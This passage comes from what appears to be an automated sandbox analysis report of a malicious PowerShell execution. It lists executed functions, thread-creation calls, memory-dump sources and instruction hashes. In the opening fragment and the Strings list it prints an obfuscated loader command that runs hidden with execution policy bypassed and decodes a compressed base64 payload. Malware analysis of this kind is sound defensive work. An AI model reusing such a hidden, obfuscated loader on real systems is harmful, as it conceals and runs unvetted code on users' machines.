LUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:42.9%
                                Total number of Nodes:7
                                Total number of Limit Nodes:0
                                execution_graph 3842 1fde6620000 3845 1fde66200ca WinExec 3842->3845 3846 1fde66200f1 RtlExitUserThread 3845->3846 3848 1fde662010d 3846->3848 3849 7ffd9badc39d 3850 7ffd9badc3ad CreateThread 3849->3850 3852 7ffd9badc49e 3850->3852

                                Executed Functions

                                Function 000001FDE66200CA Relevance: 10.0, APIs: 2, Strings: 2, Instructions: 3022processthreadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG', xrefs: 000001FDE662010B
                                • ','Q, xrefs: 000001FDE6620712
                                Memory Dump Source
                                • Source File: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FDE6620000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1fde6620000_powershell.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecExitThreadUser
                                • String ID: ','Q$powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'
                                • API String ID: 3057531529-2483721226
                                • Opcode ID: 114ad0ed077c3e2443dc5ed7d318cdd9ce1f246f3d911baececf5ecd9dda472d
                                • Instruction ID: 4a6c8f9200c2b5deae3d1091b97bca52c171796454ee1b9150486b8b6f14a055
                                • Opcode Fuzzy Hash: 114ad0ed077c3e2443dc5ed7d318cdd9ce1f246f3d911baececf5ecd9dda472d
                                • Instruction Fuzzy Hash: B95256F1435A876AFF289F307689BF67BABF762314F2452EED4815D09381116C82CE94
                                Function 00007FFD9BADC39D Relevance: 1.6, APIs: 1, Instructions: 146threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 364 7ffd9badc39d-7ffd9badc3ab 365 7ffd9badc3ae-7ffd9badc3c1 364->365 366 7ffd9badc3ad 364->366 367 7ffd9badc3c4-7ffd9badc3d5 365->367 368 7ffd9badc3c3 365->368 366->365 369 7ffd9badc3d8-7ffd9badc49c CreateThread 367->369 370 7ffd9badc3d7 367->370 368->367 373 7ffd9badc4a4-7ffd9badc4c1 369->373 374 7ffd9badc49e 369->374 370->369 374->373
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1865349539.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 69d87a6d1d1567b4a26fca8d28f1bf0d2928ee22c80b87aae6258c2b2a6984b8
                                • Instruction ID: 89cf9d4be2d3b0d4f02cc3d4ad2403dde3a7b11d94e0f1cc687dbecbaa7bf09e
                                • Opcode Fuzzy Hash: 69d87a6d1d1567b4a26fca8d28f1bf0d2928ee22c80b87aae6258c2b2a6984b8
                                • Instruction Fuzzy Hash: 9241393050D78C9FDB19DB5C98156F9BFE0EF96321F14026FE089C31A3DA64A846C782
                                Function 00007FFD9BAD9D02 Relevance: 1.6, APIs: 1, Instructions: 111threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 375 7ffd9bad9d02-7ffd9badc49c CreateThread 379 7ffd9badc4a4-7ffd9badc4c1 375->379 380 7ffd9badc49e 375->380 380->379
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1865349539.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 4a8449811c5725c01e69c4b174ec3f30d91d5af9605366cac3fe93556db469e2
                                • Instruction ID: b0f120e6acb6ade82721412e061e1dedf85ca9745ad8601e820e1d6b1c88466f
                                • Opcode Fuzzy Hash: 4a8449811c5725c01e69c4b174ec3f30d91d5af9605366cac3fe93556db469e2
                                • Instruction Fuzzy Hash: D731A47191CA0C9FDB1CDB5CD849AF9B7E1FBA9321F10422EE049D3252DB70B8458B85
                                Function 00007FFD9BBA01BB Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 381 7ffd9bba01bb-7ffd9bba01c8 382 7ffd9bba01ca-7ffd9bba01dd 381->382 383 7ffd9bba01de-7ffd9bba01f8 381->383 382->383 385 7ffd9bba01fc-7ffd9bba0233 383->385
                                Memory Dump Source
                                • Source File: 00000000.00000002.1867463607.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9bba0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 480ddf470480eaf03ed115214e4423b91e94b5d938d55504d6dde29dc3f68ee1
                                • Instruction ID: f0dd440a2d9f2251c0144077ca883e5fc0a3de56ca4dd2faee597f0ee7c64cea
                                • Opcode Fuzzy Hash: 480ddf470480eaf03ed115214e4423b91e94b5d938d55504d6dde29dc3f68ee1
                                • Instruction Fuzzy Hash: AF11A13134CD094FDB5CEA2CD4A5EB577D2FBA9310B10457ED04BC3592DE21E8828780

                                Executed Functions

                                Function 00007FFD9BB9142A Relevance: .6, Instructions: 626COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896904556.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bb90000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c4c78348c81b66b356340fa694b47dfc83c845ca24e241b403845bc258a7109
                                • Instruction ID: 0e20be520760238819065f7b852ed66d32e0ef6ae0e5048fdeb08ca9002375a0
                                • Opcode Fuzzy Hash: 8c4c78348c81b66b356340fa694b47dfc83c845ca24e241b403845bc258a7109
                                • Instruction Fuzzy Hash: F3125962A0E78D1FE766976898646B53FE1FF56218F0A01FBD08DC70E3DA18A905C351
                                Function 00007FFD9BAC60DC Relevance: .4, Instructions: 393COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896239886.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bac0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fec87a66c0b3022114dc0a8a39b3c3aad160af686443119d66a8e934801a6eda
                                • Instruction ID: 81f4aa774febb18017b115b12858caca6523e97a7dc92486f7390f5171411d70
                                • Opcode Fuzzy Hash: fec87a66c0b3022114dc0a8a39b3c3aad160af686443119d66a8e934801a6eda
                                • Instruction Fuzzy Hash: CBD14C30A18A4D8FDF98EF5CC465AAD77E1FFA8314F15426AE40DD7295CA74E881CB80
                                Function 00007FFD9BB9174C Relevance: .1, Instructions: 131COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896904556.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bb90000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df2f1845deeedfb76d850a8e0f288fee91bf59213ccc1d7f5daeddd7b63c2976
                                • Instruction ID: 314a0aca7bdd1a66530f16778c135e9e54dcef19f7300f5c040a4c7dac771941
                                • Opcode Fuzzy Hash: df2f1845deeedfb76d850a8e0f288fee91bf59213ccc1d7f5daeddd7b63c2976
                                • Instruction Fuzzy Hash: 9A418D61A0E7C95FE3679B7488B46643FB1AF43248F0A01EBD088CB0F3DA685D09D712
                                Function 00007FFD9BB915A3 Relevance: .1, Instructions: 104COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896904556.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bb90000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 39b49236f9e4ba09bb2a963c7bdb01abffc7813d541009ef3f54b332638362f1
                                • Instruction ID: 893cde8a8cde16abdf67f79733b4768e1d59d04fdac280d617a04e84ebcc5994
                                • Opcode Fuzzy Hash: 39b49236f9e4ba09bb2a963c7bdb01abffc7813d541009ef3f54b332638362f1
                                • Instruction Fuzzy Hash: 5021A666F1FA0F1BEBB8865CE86567422D1FF8822CB4E027AD45FC31E5DD04ED066281
                                Function 00007FFD9BB95CBE Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896904556.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bb90000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a550529f99db3aea867081a3bf587e52c1ada53272546c39ccc2cb656ae3989
                                • Instruction ID: 5362eba8b7c9d7a34976558d140a526bb68079ea825b9f3f0b79dc6499dd0afe
                                • Opcode Fuzzy Hash: 7a550529f99db3aea867081a3bf587e52c1ada53272546c39ccc2cb656ae3989
                                • Instruction Fuzzy Hash: 38112022B0EB8D4FEB65DBA884A85A87BA1FF49308F1400BFC45CC70E3DA256C41C321
                                Function 00007FFD9BAC5C34 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896239886.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bac0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 92e8ba00dd3a98791456287daef077ef165cae73eff451a8f4908623027843a9
                                • Instruction ID: 8c89d1bf116141e0940d2d15493131752d1fa8c640577f71184f4f67ed00cd0f
                                • Opcode Fuzzy Hash: 92e8ba00dd3a98791456287daef077ef165cae73eff451a8f4908623027843a9
                                • Instruction Fuzzy Hash: AD01B53170CB084FD798EF4CE492AB5B3D0EF98325F10056DF08AC36A6DA26E841C745
                                Function 00007FFD9BAC37B5 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1896239886.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9bac0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                • Instruction ID: b30bcf00dc4a06dcbee5922f6fe2125f302c1a1430f13c12e432abc0679d0be7
                                • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                • Instruction Fuzzy Hash: 3601847020CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB45